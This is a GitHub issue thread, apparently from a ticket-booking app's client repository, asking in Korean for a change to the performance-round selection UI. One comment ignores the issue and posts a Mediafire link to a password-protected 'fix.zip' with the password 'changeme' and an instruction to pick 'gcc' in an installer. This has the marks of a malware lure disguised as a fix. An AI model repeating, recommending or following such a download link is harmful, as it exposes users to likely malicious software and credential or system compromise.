### ISSUE TITLE
[ Feat ] 예매 페이지 회차 선택 UI 수정

### ISSUE THREAD

**Issue by pepperdad** [TEAM-BEAT/BEAT-Client#375]
### 🛠 Issue

<img width="224" alt="image" src="https://github.com/user-attachments/assets/2287a4b8-d406-4c8a-b732-abf1a7ea14d6">

회차 선택이 최대 1회로 늘어남에 따라 회차 선택할 수 있는 UI 수정

### 📝 To-do

- [ ] 회차 선택 UI 수정

### 🔍 접근 방법

.

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
